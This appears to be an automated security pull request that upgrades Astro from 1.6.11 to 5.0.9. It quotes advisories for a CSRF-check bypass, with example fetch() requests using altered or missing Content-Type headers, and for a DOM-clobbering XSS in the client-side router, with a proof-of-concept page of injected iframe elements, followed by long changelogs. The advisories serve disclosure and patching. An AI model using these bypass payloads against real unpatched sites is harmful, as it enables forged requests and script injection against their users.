🚨 [security] Update astro 1.6.11 → 5.0.9 (major)

🚨 Your current dependencies have known security vulnerabilities 🚨

This dependency update fixes known security vulnerabilities. Please see the details below and assess their impact carefully. We recommend to merge and deploy this as soon as possible!

Here is everything you need to know about this update. Please take a good look at what changed and the test results before merging this pull request.

What changed?

✳️ astro (1.6.11 → 5.0.9) · Repo · Changelog

Security Advisories 🚨

🚨 Atro CSRF Middleware Bypass (security.checkOrigin)

Summary

A bug in Astro’s CSRF-protection middleware allows requests to bypass CSRF checks.

Details

When the security.checkOrigin configuration option is set to true, Astro middleware will perform a CSRF check. (Source code: https://github.com/withastro/astro/blob/6031962ab5f56457de986eb82bd24807e926ba1b/packages/astro/src/core/app/middlewares.ts)

For example, with the following Astro configuration:

// astro.config.mjs
import { defineConfig } from 'astro/config';
import node from '@astrojs/node';

export default defineConfig({
	output: 'server',
	security: { checkOrigin: true },
	adapter: node({ mode: 'standalone' }),
});

A request like the following would be blocked if made from a different origin:

// fetch API or <form action="https://test.example.com/" method="POST">
fetch('https://test.example.com/', {
	method: 'POST',
	credentials: 'include',
	body: 'a=b',
	headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
});
// => Cross-site POST form submissions are forbidden

However, a vulnerability exists that can bypass this security.

Pattern 1: Requests with a semicolon after the Content-Type

A semicolon-delimited parameter is allowed after the type in Content-Type.

Web browsers will treat a Content-Type such as application/x-www-form-urlencoded; abc as a simple request and will not perform preflight validation. In this case, CSRF is not blocked as expected.

fetch('https://test.example.com', {
	method: 'POST',
	credentials: 'include',
	body: 'test',
	headers: { 'Content-Type': 'application/x-www-form-urlencoded; abc' },
});
// => Server-side functions are executed (Response Code 200).

Pattern 2: Request without Content-Type header

The Content-Type header is not required for a request. The following examples are sent without a Content-Type header, resulting in CSRF.

// Pattern 2.1 Request without body
fetch('http://test.example.com', { method: 'POST', credentials: 'include' });

// Pattern 2.2 Blob object without type
fetch('https://test.example.com', {
	method: 'POST',
	credentials: 'include',
	body: new Blob(['a=b'], {}),
});

Impact

Bypass CSRF protection implemented with CSRF middleware.

Note

Even with credentials: 'include', browsers may not send cookies due to third-party cookie blocking. This feature depends on the browser version and settings, and is for privacy protection, not as a CSRF measure.

🚨 DOM Clobbering Gadget found in astro's client-side router that leads to XSS

Summary

A DOM Clobbering gadget has been discoverd in Astro's client-side router. It can lead to cross-site scripting (XSS) in websites enables Astro's client-side routing and has stored attacker-controlled scriptless HTML elements (i.e., iframe tags with unsanitized name attributes) on the destination pages.

Details

Backgrounds

DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:

[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/

Gadgets found in Astro

We identified a DOM Clobbering gadget in Astro's client-side routing module, specifically in the <ViewTransitions /> component. When integrated, this component introduces the following vulnerable code, which is executed during page transitions (e.g., clicking an <a> link):

astro/packages/astro/src/transitions/router.ts

Lines 135 to 156 in 7814a6c

function runScripts() {
let wait = Promise.resolve();
for (const script of Array.from(document.scripts)) {
if (script.dataset.astroExec === '') continue;
const type = script.getAttribute('type');
if (type && type !== 'module' && type !== 'text/javascript') continue;
const newScript = document.createElement('script');
newScript.innerHTML = script.innerHTML;
for (const attr of script.attributes) {
if (attr.name === 'src') {
const p = new Promise((r) => {
newScript.onload = newScript.onerror = r;
});
wait = wait.then(() => p as any);
}
newScript.setAttribute(attr.name, attr.value);
}
newScript.dataset.astroExec = '';
script.replaceWith(newScript);
}
return wait;
}

However, this implementation is vulnerable to a DOM Clobbering attack. The document.scripts lookup can be shadowed by an attacker injected non-script HTML elements (e.g., <img name="scripts"><img name="scripts">) via the browser's named DOM access mechanism. This manipulation allows an attacker to replace the intended script elements with an array of attacker-controlled scriptless HTML elements.

The condition script.dataset.astroExec === '' on line 138 can be bypassed because the attacker-controlled element does not have a data-astroExec attribute. Similarly, the check on line 134 can be bypassed as the element does not require a type attribute.

Finally, the innerHTML of an attacker-injected non-script HTML elements, which is plain text content before, will be set to the .innerHTML of an script element that leads to XSS.

PoC

Consider a web application using Astro as the framework with client-side routing enabled and allowing users to embed certain scriptless HTML elements (e.g., form or iframe). This can be done through a bunch of website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.

For PoC website, please refer to: https://stackblitz.com/edit/github-4xgj2d. Clicking the "about" button in the menu will trigger an alert(1) from an attacker-injected form element.

---
import Header from "../components/Header.astro";
import Footer from "../components/Footer.astro";
import { ViewTransitions } from "astro:transitions";
import "../styles/global.css";
const { pageTitle } = Astro.props;
---
<html lang="en">
  <head>
    <meta charset="utf-8" />
    <link rel="icon" type="image/svg+xml" href="/favicon.svg" />
    <meta name="viewport" content="width=device-width" />
    <meta name="generator" content={Astro.generator} />
    <title>{pageTitle}</title>
    <ViewTransitions />
  </head>
  <body>
    <!--USER INPUT-->
    <iframe name="scripts">alert(1)</iframe>
    <iframe name="scripts">alert(1)</iframe>
    <!--USER INPUT-->
    
    <Header />
    <h1>{pageTitle}</h1>
    <slot />
    <Footer />
    <script>
      import "../scripts/menu.js";
    </script>
  </body>
</html>

Impact

This vulnerability can result in cross-site scripting (XSS) attacks on websites that built with Astro that enable the client-side routing with ViewTransitions and store the user-inserted scriptless HTML tags without properly sanitizing the name attributes on the page.

Patch

We recommend replacing document.scripts with document.getElementsByTagName('script') for referring to script elements. This will mitigate the possibility of DOM Clobbering attacks leveraging the name attribute.

Reference

Similar issues for reference:

Release Notes

Too many releases to show here. View the full release notes.

✳️ @​astrojs/node (3.1.0 → 9.0.0) · Repo

Sorry, we couldn’t find anything useful about this release.

✳️ @​astrojs/react (1.2.2 → 4.1.1) · Repo

Sorry, we couldn’t find anything useful about this release.

✳️ @​astrojs/tailwind (2.1.3 → 5.1.3) · Repo

Sorry, we couldn’t find anything useful about this release.

✳️ prettier-plugin-astro (0.7.0 → 0.14.1) · Repo · Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 56 commits:

↗️ @​ampproject/remapping (indirect, 2.2.0 → 2.3.0) · Repo

Commits

See the full diff on Github. The new version differs by 11 commits:

↗️ @​astrojs/compiler (indirect, 0.29.17 → 2.10.3) · Repo · Changelog

Release Notes

Too many releases to show here. View the full release notes.

↗️ @​astrojs/markdown-remark (indirect, 1.1.3 → 6.0.1) · Repo

Sorry, we couldn’t find anything useful about this release.

↗️ @​astrojs/prism (indirect, 1.0.2 → 3.2.0) · Repo

Sorry, we couldn’t find anything useful about this release.

↗️ @​astrojs/telemetry (indirect, 1.0.1 → 3.2.0) · Repo · Changelog

Release Notes

3.2.0 (from changelog)

Minor Changes

3.1.0 (from changelog)

Minor Changes

3.0.4 (from changelog)

Patch Changes

  • #8900 341ef6578 Thanks @FredKSchott! - Track if the Astro CLI is running in a TTY context.

    This information helps us better understand scripted use of Astro vs. direct terminal use of Astro CLI by a user, especially the astro dev command.

3.0.3 (from changelog)

Patch Changes

3.0.2 (from changelog)

Patch Changes

3.0.1 (from changelog)

Patch Changes

3.0.0 (from changelog)

Major Changes

  • #8188 d0679a666 Thanks @ematipico! - Remove support for Node 16. The lowest supported version by Astro and all integrations is now v18.14.1. As a reminder, Node 16 will be deprecated on the 11th September 2023.

  • #8179 6011d52d3 Thanks @matthewp! - Astro 3.0 Release Candidate

Patch Changes

2.1.1 (from changelog)

Patch Changes

2.1.0 (from changelog)

Minor Changes

2.0.1 (from changelog)

Patch Changes

Does any of this look wrong? Please let us know.

↗️ @​babel/compat-data (indirect, 7.20.1 → 7.26.3) · Repo · Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ @​babel/core (indirect, 7.20.2 → 7.26.0) · Repo · Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ @​babel/helper-compilation-targets (indirect, 7.20.0 → 7.25.9) · Repo · Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 14 commits:

↗️ @​babel/helper-module-imports (indirect, 7.18.6 → 7.25.9) · Repo · Changelog

Release Notes

7.25.9

v7.25.9 (2024-10-22)

Thanks @victorenator for your first PR!

🐛 Bug Fix

  • babel-parser, babel-template, babel-types
  • babel-helper-compilation-targets, babel-preset-env
  • Other

🏠 Internal

  • babel-helper-transform-fixture-test-runner
  • Every package

🏃‍♀️ Performance

  • babel-parser, babel-types

Committers: 4

7.25.7

v7.25.7 (2024-10-02)

Thanks @DylanPiercey and @YuHyeonWook for your first PRs!

🐛 Bug Fix

💅 Polish

🏠 Internal

  • babel-core
  • babel-helper-compilation-targets, babel-helper-plugin-utils, babel-preset-env
  • babel-plugin-proposal-destructuring-private, babel-plugin-syntax-decimal, babel-plugin-syntax-import-reflection, babel-standalone
  • babel-generator

🏃‍♀️ Performance

Committers: 8

7.24.7

v7.24.7 (2024-06-05)

🐛 Bug Fix

  • babel-node
  • babel-traverse
  • babel-helper-transform-fixture-test-runner, babel-plugin-proposal-explicit-resource-management

🏠 Internal

  • babel-helpers, babel-runtime-corejs2, babel-runtime-corejs3, babel-runtime

Committers: 7

7.24.6

v7.24.6 (2024-05-24)

Thanks @amjed-98, @blakewilson, @coelhucas, and @SukkaW for your first PRs!

🐛 Bug Fix

  • babel-helper-create-class-features-plugin, babel-plugin-transform-class-properties
  • babel-core, babel-generator, babel-plugin-transform-modules-commonjs
  • babel-helper-create-class-features-plugin, babel-plugin-proposal-decorators
  • babel-helpers, babel-plugin-proposal-decorators, babel-runtime-corejs3
    • #16483 Fix: throw TypeError if addInitializer is called after finished (@JLHwung)
  • babel-parser, babel-plugin-transform-typescript

🏠 Internal

  • babel-core, babel-helpers, babel-plugin-transform-runtime, babel-preset-env, babel-runtime-corejs2, babel-runtime-corejs3, babel-runtime
  • babel-helpers
  • babel-cli, babel-helpers, babel-plugin-external-helpers, babel-plugin-proposal-decorators, babel-plugin-transform-class-properties, babel-plugin-transform-modules-commonjs, babel-plugin-transform-modules-systemjs, babel-plugin-transform-runtime, babel-preset-env, babel-runtime-corejs2, babel-runtime-corejs3, babel-runtime
  • babel-parser, babel-traverse
  • Other

Committers: 9

7.24.3

v7.24.3 (2024-03-20)

🐛 Bug Fix

  • babel-helper-module-imports
    • #16370 fix: do not inject the same imported identifier multiple times (@ota-meshi)

Committers: 2

7.24.1

v7.24.1 (2024-03-19)

🐛 Bug Fix

  • babel-helper-create-class-features-plugin, babel-plugin-proposal-decorators
  • babel-plugin-proposal-decorators, babel-plugin-proposal-json-modules, babel-plugin-transform-async-generator-functions, babel-plugin-transform-regenerator, babel-plugin-transform-runtime, babel-preset-env
  • babel-helper-create-class-features-plugin, babel-plugin-proposal-decorators, babel-plugin-proposal-pipeline-operator, babel-plugin-transform-class-properties
  • babel-helper-create-class-features-plugin, babel-helper-replace-supers, babel-plugin-proposal-decorators, babel-plugin-transform-class-properties

📝 Documentation

🏠 Internal

  • babel-code-frame, babel-highlight
  • babel-helper-fixtures, babel-helpers, babel-plugin-bugfix-safari-id-destructuring-collision-in-function-expression, babel-plugin-proposal-pipeline-operator, babel-plugin-transform-unicode-sets-regex, babel-preset-env, babel-preset-flow
  • babel-helper-module-imports, babel-plugin-proposal-import-wasm-source, babel-plugin-proposal-json-modules, babel-plugin-proposal-record-and-tuple, babel-plugin-transform-react-jsx-development, babel-plugin-transform-react-jsx
  • Other

🔬 Output optimization

  • babel-helper-replace-supers, babel-plugin-transform-class-properties, babel-plugin-transform-classes, babel-plugin-transform-parameters, babel-plugin-transform-runtime
  • babel-plugin-transform-class-properties, babel-plugin-transform-classes
  • babel-plugin-proposal-decorators, babel-plugin-transform-class-properties, babel-plugin-transform-object-rest-spread, babel-traverse
  • babel-core, babel-plugin-external-helpers, babel-plugin-proposal-decorators, babel-plugin-proposal-function-bind, babel-plugin-transform-class-properties, babel-plugin-transform-classes, babel-plugin-transform-flow-comments, babel-plugin-transform-flow-strip-types, babel-plugin-transform-function-name, babel-plugin-transform-modules-systemjs, babel-plugin-transform-parameters, babel-plugin-transform-private-property-in-object, babel-plugin-transform-react-jsx, babel-plugin-transform-runtime, babel-plugin-transform-spread, babel-plugin-transform-typescript, babel-preset-env

Committers: 4

7.22.15

v7.22.15 (2023-09-04)

🐛 Bug Fix

🏠 Internal

Committers: 4

7.22.5

v7.22.5 (2023-06-08)

🐛 Bug Fix

  • babel-preset-env, babel-standalone

💅 Polish

Committers: 4

7.21.4

v7.21.4 (2023-03-31)

🐛 Bug Fix

  • babel-core, babel-helper-module-imports, babel-preset-typescript
  • babel-generator
    • #15496 Fix compact printing of non-null assertion operators (@rtsao)

💅 Polish

  • babel-helper-create-class-features-plugin, babel-plugin-proposal-class-properties, babel-plugin-transform-typescript, babel-traverse

🏠 Internal

  • Other
  • babel-parser
  • babel-code-frame, babel-highlight

Committers: 6

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 14 commits:

↗️ @​babel/helper-module-transforms (indirect, 7.20.2 → 7.26.0) · Repo · Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ @​babel/helper-plugin-utils (indirect, 7.20.2 → 7.25.9) · Repo · Changelog

Release Notes

7.25.9

v7.25.9 (2024-10-22)

Thanks @victorenator for your first PR!

🐛 Bug Fix

  • babel-parser, babel-template, babel-types
  • babel-helper-compilation-targets, babel-preset-env
  • Other

🏠 Internal

  • babel-helper-transform-fixture-test-runner
  • Every package

🏃‍♀️ Performance

  • babel-parser, babel-types

Committers: 4

7.25.7

v7.25.7 (2024-10-02)

Thanks @DylanPiercey and @YuHyeonWook for your first PRs!

🐛 Bug Fix

💅 Polish

🏠 Internal

  • babel-core
  • babel-helper-compilation-targets, babel-helper-plugin-utils, babel-preset-env
  • babel-plugin-proposal-destructuring-private, babel-plugin-syntax-decimal, babel-plugin-syntax-import-reflection, babel-standalone
  • babel-generator

🏃‍♀️ Performance

Committers: 8

7.24.8

v7.24.8 (2024-07-11)

Thanks @H0onnn, @jkup and @SreeXD for your first pull requests!

👓 Spec Compliance

🐛 Bug Fix

💅 Polish

Committers: 9

7.24.7

v7.24.7 (2024-06-05)

🐛 Bug Fix

  • babel-node
  • babel-traverse
  • babel-helper-transform-fixture-test-runner, babel-plugin-proposal-explicit-resource-management

🏠 Internal

  • babel-helpers, babel-runtime-corejs2, babel-runtime-corejs3, babel-runtime

Committers: 7

7.24.6

v7.24.6 (2024-05-24)

Thanks @amjed-98, @blakewilson, @coelhucas, and @SukkaW for your first PRs!

🐛 Bug Fix

  • babel-helper-create-class-features-plugin, babel-plugin-transform-class-properties
  • babel-core, babel-generator, babel-plugin-transform-modules-commonjs
  • babel-helper-create-class-features-plugin, babel-plugin-proposal-decorators
  • babel-helpers, babel-plugin-proposal-decorators, babel-runtime-corejs3
    • #16483 Fix: throw TypeError if addInitializer is called after finished (@JLHwung)
  • babel-parser, babel-plugin-transform-typescript

🏠 Internal

  • babel-core, babel-helpers, babel-plugin-transform-runtime, babel-preset-env, babel-runtime-corejs2, babel-runtime-corejs3, babel-runtime
  • babel-helpers
  • babel-cli, babel-helpers, babel-plugin-external-helpers, babel-plugin-proposal-decorators, babel-plugin-transform-class-properties, babel-plugin-transform-modules-commonjs, babel-plugin-transform-modules-systemjs, babel-plugin-transform-runtime, babel-preset-env, babel-runtime-corejs2, babel-runtime-corejs3, babel-runtime
  • babel-parser, babel-traverse
  • Other

Committers: 9

7.24.5

v7.24.5 (2024-04-29)

Thanks @romgrk and @sossost for your first PRs!

🐛 Bug Fix

  • babel-plugin-transform-classes, babel-traverse
  • babel-helpers, babel-plugin-proposal-explicit-resource-management, babel-runtime-corejs3

💅 Polish

  • babel-parser

🏠 Internal

  • Other
  • babel-parser
  • babel-helper-create-class-features-plugin, babel-helper-member-expression-to-functions, babel-helper-module-transforms, babel-helper-split-export-declaration, babel-helper-wrap-function, babel-helpers, babel-plugin-bugfix-firefox-class-in-computed-class-key, babel-plugin-proposal-explicit-resource-management, babel-plugin-transform-block-scoping, babel-plugin-transform-destructuring, babel-plugin-transform-object-rest-spread, babel-plugin-transform-optional-chaining, babel-plugin-transform-parameters, babel-plugin-transform-private-property-in-object, babel-plugin-transform-react-jsx-self, babel-plugin-transform-typeof-symbol, babel-plugin-transform-typescript, babel-traverse
  • babel-plugin-proposal-partial-application, babel-types
  • babel-plugin-transform-class-properties, babel-preset-env

🏃‍♀️ Performance

  • babel-helpers, babel-preset-env, babel-runtime-corejs3
    • #16357 Performance: improve objectWithoutPropertiesLoose on V8 (@romgrk)

Committers: 6

7.24.0

v7.24.0 (2024-02-28)

Thanks @ajihyf for your first PR!

Release post with summary and highlights: https://babeljs.io/7.24.0

🚀 New Feature

  • babel-standalone
    • #11696 Export babel tooling packages in @babel/standalone (@ajihyf)
  • babel-core, babel-helper-create-class-features-plugin, babel-helpers, babel-plugin-transform-class-properties
  • babel-helper-create-class-features-plugin, babel-helpers, babel-plugin-proposal-decorators, babel-plugin-proposal-pipeline-operator, babel-plugin-syntax-decorators, babel-plugin-transform-class-properties, babel-runtime-corejs2, babel-runtime-corejs3, babel-runtime
  • babel-preset-flow
  • babel-helper-import-to-platform-api, babel-plugin-proposal-import-wasm-source, babel-plugin-proposal-json-modules, babel-standalone
  • babel-plugin-transform-runtime
  • babel-parser, babel-types

🐛 Bug Fix

  • babel-plugin-proposal-do-expressions, babel-traverse
  • babel-helper-create-class-features-plugin, babel-plugin-transform-private-methods, babel-plugin-transform-private-property-in-object
  • babel-helper-create-class-features-plugin, babel-plugin-transform-private-methods
  • babel-helper-create-class-features-plugin, babel-helpers, babel-plugin-proposal-decorators
  • babel-helper-create-class-features-plugin, babel-plugin-proposal-decorators
  • babel-helper-create-class-features-plugin, babel-plugin-proposal-decorators, babel-plugin-transform-async-generator-functions, babel-plugin-transform-private-methods, babel-plugin-transform-private-property-in-object, babel-plugin-transform-typescript, babel-preset-env
  • babel-helpers
  • babel-helpers, babel-plugin-proposal-decorators

💅 Polish

  • babel-core, babel-helper-create-class-features-plugin, babel-preset-env

🏠 Internal

  • babel-helper-transform-fixture-test-runner

🔬 Output optimization

  • babel-helper-create-class-features-plugin, babel-plugin-proposal-decorators
  • babel-helper-create-class-features-plugin, babel-helpers, babel-plugin-proposal-decorators, babel-plugin-proposal-pipeline-operator, babel-plugin-transform-class-properties
  • babel-helper-create-class-features-plugin, babel-helpers, babel-plugin-transform-private-methods
  • babel-helper-create-class-features-plugin, babel-helpers, babel-plugin-proposal-decorators
  • babel-helper-create-class-features-plugin, babel-plugin-proposal-decorators, babel-plugin-transform-class-properties
  • babel-helper-create-class-features-plugin, babel-helper-fixtures, babel-helpers, babel-plugin-bugfix-v8-spread-parameters-in-optional-chaining, babel-plugin-proposal-decorators, babel-plugin-proposal-destructuring-private, babel-plugin-proposal-optional-chaining-assign, babel-plugin-transform-class-properties, babel-plugin-transform-class-static-block, babel-plugin-transform-private-methods, babel-plugin-transform-private-property-in-object, babel-preset-env, babel-runtime-corejs2, babel-runtime-corejs3, babel-runtime
  • babel-helpers, babel-plugin-proposal-decorators

Committers: 7

7.22.5

v7.22.5 (2023-06-08)

🐛 Bug Fix

  • babel-preset-env, babel-standalone

💅 Polish

Committers: 4

7.21.5

v7.21.5 (2023-04-28)

👓 Spec Compliance

  • babel-generator, babel-parser, babel-types
    • #15539 fix: Remove mixins and implements for DeclareInterface and InterfaceDeclaration (@liuxingbaoyu)

🐛 Bug Fix

  • babel-core, babel-generator, babel-plugin-transform-modules-commonjs, babel-plugin-transform-react-jsx
  • babel-preset-env

💅 Polish

🏠 Internal

  • babel-core
  • babel-helper-fixtures, babel-preset-typescript
    • #15568 Handle .overrides and .env when resolving plugins/presets from fixture options (@JLHwung)
  • babel-helper-create-class-features-plugin, babel-helper-create-regexp-features-plugin

Committers: 4

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ @​babel/helpers (indirect, 7.20.1 → 7.26.0) · Repo · Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ @​esbuild/android-arm (indirect, 0.15.15 → 0.24.0) · Repo · Changelog

Release Notes

0.24.0

This release deliberately contains backwards-incompatible changes. To avoid automatically picking up releases like this, you should either be pinning the exact version of esbuild in your package.json file (recommended) or be using a version range syntax that only accepts patch upgrades such as ^0.23.0 or ~0.23.0. See npm's documentation about semver for more information.

  • Drop support for older platforms (#3902)

    This release drops support for the following operating system:

    • macOS 10.15 Catalina

    This is because the Go programming language dropped support for this operating system version in Go 1.23, and this release updates esbuild from Go 1.22 to Go 1.23. Go 1.23 now requires macOS 11 Big Sur or later.

    Note that this only affects the binary esbuild executables that are published to the esbuild npm package. It's still possible to compile esbuild's source code for these older operating systems. If you need to, you can compile esbuild for yourself using an older version of the Go compiler (before Go version 1.23). That might look something like this:

    git clone https://github.com/evanw/esbuild.git
cd esbuild
go build ./cmd/esbuild
./esbuild --version

  • Fix class field decorators in TypeScript if useDefineForClassFields is false (#3913)

    Setting the useDefineForClassFields flag to false in tsconfig.json means class fields use the legacy TypeScript behavior instead of the standard JavaScript behavior. Specifically they use assign semantics instead of define semantics (e.g. setters are triggered) and fields without an initializer are not initialized at all. However, when this legacy behavior is combined with standard JavaScript decorators, TypeScript switches to always initializing all fields, even those without initializers. Previously esbuild incorrectly continued to omit field initializers for this edge case. These field initializers in this case should now be emitted starting with this release.

  • Avoid incorrect cycle warning with tsconfig.json multiple inheritance (#3898)

    TypeScript 5.0 introduced multiple inheritance for tsconfig.json files where extends can be an array of file paths. Previously esbuild would incorrectly treat files encountered more than once when processing separate subtrees of the multiple inheritance hierarchy as an inheritance cycle. With this release, tsconfig.json files containing this edge case should work correctly without generating a warning.

  • Handle Yarn Plug'n'Play stack overflow with tsconfig.json (#3915)

    Previously a tsconfig.json file that extends another file in a package with an exports map could cause a stack overflow when Yarn's Plug'n'Play resolution was active. This edge case should work now starting with this release.

  • Work around more issues with Deno 1.31+ (#3917)

    This version of Deno broke the stdin and stdout properties on command objects for inherited streams, which matters when you run esbuild's Deno module as the entry point (i.e. when import.meta.main is true). Previously esbuild would crash in Deno 1.31+ if you ran esbuild like that. This should be fixed starting with this release.

    This fix was contributed by @Joshix-1.

0.23.1

  • Allow using the node: import prefix with es* targets (#3821)

    The node: prefix on imports is an alternate way to import built-in node modules. For example, import fs from "fs" can also be written import fs from "node:fs". This only works with certain newer versions of node, so esbuild removes it when you target older versions of node such as with --target=node14 so that your code still works. With the way esbuild's platform-specific feature compatibility table works, this was added by saying that only newer versions of node support this feature. However, that means that a target such as --target=node18,es2022 removes the node: prefix because none of the es* targets are known to support this feature. This release adds the support for the node: flag to esbuild's internal compatibility table for es* to allow you to use compound targets like this:

    // Original code
import fs from 'node:fs'
fs.open

// Old output (with --bundle --format=esm --platform=node --target=node18,es2022)
import fs from "fs";
fs.open;

// New output (with --bundle --format=esm --platform=node --target=node18,es2022)
import fs from "node:fs";
fs.open;

  • Fix a panic when using the CLI with invalid build flags if --analyze is present (#3834)

    Previously esbuild's CLI could crash if it was invoked with flags that aren't valid for a "build" API call and the --analyze flag is present. This was caused by esbuild's internals attempting to add a Go plugin (which is how --analyze is implemented) to a null build object. The panic has been fixed in this release.

  • Fix incorrect location of certain error messages (#3845)

    This release fixes a regression that caused certain errors relating to variable declarations to be reported at an incorrect location. The regression was introduced in version 0.18.7 of esbuild.

  • Print comments before case clauses in switch statements (#3838)

    With this release, esbuild will attempt to print comments that come before case clauses in switch statements. This is similar to what esbuild already does for comments inside of certain types of expressions. Note that these types of comments are not printed if minification is enabled (specifically whitespace minification).

  • Fix a memory leak with pluginData (#3825)

    With this release, the build context's internal pluginData cache will now be cleared when starting a new build. This should fix a leak of memory from plugins that return pluginData objects from onResolve and/or onLoad callbacks.

0.23.0

This release deliberately contains backwards-incompatible changes. To avoid automatically picking up releases like this, you should either be pinning the exact version of esbuild in your package.json file (recommended) or be using a version range syntax that only accepts patch upgrades such as ^0.22.0 or ~0.22.0. See npm's documentation about semver for more information.

  • Revert the recent change to avoid bundling dependencies for node (#3819)

    This release reverts the recent change in version 0.22.0 that made --packages=external the default behavior with --platform=node. The default is now back to --packages=bundle.

    I've just been made aware that Amazon doesn't pin their dependencies in their "AWS CDK" product, which means that whenever esbuild publishes a new release, many people (potentially everyone?) using their SDK around the world instantly starts using it without Amazon checking that it works first. This change in version 0.22.0 happened to break their SDK. I'm amazed that things haven't broken before this point. This revert attempts to avoid these problems for Amazon's customers. Hopefully Amazon will pin their dependencies in the future.

    In addition, this is probably a sign that esbuild is used widely enough that it now needs to switch to a more complicated release model. I may have esbuild use a beta channel model for further development.

  • Fix preserving collapsed JSX whitespace (#3818)

    When transformed, certain whitespace inside JSX elements is ignored completely if it collapses to an empty string. However, the whitespace should only be ignored if the JSX is being transformed, not if it's being preserved. This release fixes a bug where esbuild was previously incorrectly ignoring collapsed whitespace with --jsx=preserve. Here is an example:

    // Original code
<Foo>
  <Bar />
</Foo>

// Old output (with --jsx=preserve)
<Foo><Bar /></Foo>;

// New output (with --jsx=preserve)
<Foo>
  <Bar />
</Foo>;

0.22.0

This release deliberately contains backwards-incompatible changes. To avoid automatically picking up releases like this, you should either be pinning the exact version of esbuild in your package.json file (recommended) or be using a version range syntax that only accepts patch upgrades such as ^0.21.0 or ~0.21.0. See npm's documentation about semver for more information.

  • Omit packages from bundles by default when targeting node (#1874, #2830, #2846, #2915, #3145, #3294, #3323, #3582, #3809, #3815)

    This breaking change is an experiment. People are commonly confused when using esbuild to bundle code for node (i.e. for --platform=node) because some packages may not be intended for bundlers, and may use node-specific features that don't work with a bundler. Even though esbuild's "getting started" instructions say to use --packages=external to work around this problem, many people don't read the documentation and don't do this, and are then confused when it doesn't work. So arguably this is a bad default behavior for esbuild to have if people keep tripping over this.

    With this release, esbuild will now omit packages from the bundle by default when the platform is node (i.e. the previous behavior of --packages=external is now the default in this case). Note that your dependencies must now be present on the file system when your bundle is run. If you don't want this behavior, you can do --packages=bundle to allow packages to be included in the bundle (i.e. the previous default behavior). Note that --packages=bundle doesn't mean all packages are bundled, just that packages are allowed to be bundled. You can still exclude individual packages from the bundle using --external: even when --packages=bundle is present.

    The --packages= setting considers all import paths that "look like" package imports in the original source code to be package imports. Specifically import paths that don't start with a path segment of / or . or .. are considered to be package imports. The only two exceptions to this rule are subpath imports (which start with a # character) and TypeScript path remappings via paths and/or baseUrl in tsconfig.json (which are applied first).

  • Drop support for older platforms (#3802)

    This release drops support for the following operating systems:

    • Windows 7
    • Windows 8
    • Windows Server 2008
    • Windows Server 2012

    This is because the Go programming language dropped support for these operating system versions in Go 1.21, and this release updates esbuild from Go 1.20 to Go 1.22.

    Note that this only affects the binary esbuild executables that are published to the esbuild npm package. It's still possible to compile esbuild's source code for these older operating systems. If you need to, you can compile esbuild for yourself using an older version of the Go compiler (before Go version 1.21). That might look something like this:

    git clone https://github.com/evanw/esbuild.git
cd esbuild
go build ./cmd/esbuild
./esbuild.exe --version

    In addition, this release increases the minimum required node version for esbuild's JavaScript API from node 12 to node 18. Node 18 is the oldest version of node that is still being supported (see node's release schedule for more information). This increase is because of an incompatibility between the JavaScript that the Go compiler generates for the esbuild-wasm package and versions of node before node 17.4 (specifically the crypto.getRandomValues function).

  • Update await using behavior to match TypeScript

    TypeScript 5.5 subtly changes the way await using behaves. This release updates esbuild to match these changes in TypeScript. You can read more about these changes in microsoft/TypeScript#58624.

  • Allow es2024 as a target environment

    The ECMAScript 2024 specification was just approved, so it has been added to esbuild as a possible compilation target. You can read more about the features that it adds here: https://2ality.com/2024/06/ecmascript-2024.html. The only addition that's relevant for esbuild is the regular expression /v flag. With --target=es2024, regular expressions that use the /v flag will now be passed through untransformed instead of being transformed into a call to new RegExp.

  • Publish binaries for OpenBSD on 64-bit ARM (#3665, #3674)

    With this release, you should now be able to install the esbuild npm package in OpenBSD on 64-bit ARM, such as on an Apple device with an M1 chip.

    This was contributed by @ikmckenz.

  • Publish binaries for WASI (WebAssembly System Interface) preview 1 (#3300, #3779)

    The upcoming WASI (WebAssembly System Interface) standard is going to be a way to run WebAssembly outside of a JavaScript host environment. In this scenario you only need a .wasm file without any supporting JavaScript code. Instead of JavaScript providing the APIs for the host environment, the WASI standard specifies a "system interface" that WebAssembly code can access directly (e.g. for file system access).

    Development versions of the WASI specification are being released using preview numbers. The people behind WASI are currently working on preview 2 but the Go compiler has released support for preview 1, which from what I understand is now considered an unsupported legacy release. However, some people have requested that esbuild publish binary executables that support WASI preview 1 so they can experiment with them.

    This release publishes esbuild precompiled for WASI preview 1 to the @esbuild/wasi-preview1 package on npm (specifically the file @esbuild/wasi-preview1/esbuild.wasm). This binary executable has not been tested and won't be officially supported, as it's for an old preview release of a specification that has since moved in another direction. If it works for you, great! If not, then you'll likely have to wait for the ecosystem to evolve before using esbuild with WASI. For example, it sounds like perhaps WASI preview 1 doesn't include support for opening network sockets so esbuild's local development server is unlikely to work with WASI preview 1.

  • Warn about onResolve plugins not setting a path (#3790)

    Plugins that return values from onResolve without resolving the path (i.e. without setting either path or external: true) will now cause a warning. This is because esbuild only uses return values from onResolve if it successfully resolves the path, and it's not good for invalid input to be silently ignored.

  • Add a new Go API for running the CLI with plugins (#3539)

    With esbuild's Go API, you can now call cli.RunWithPlugins(args, plugins) to pass an array of esbuild plugins to be used during the build process. This allows you to create a CLI that behaves similarly to esbuild's CLI but with additional Go plugins enabled.

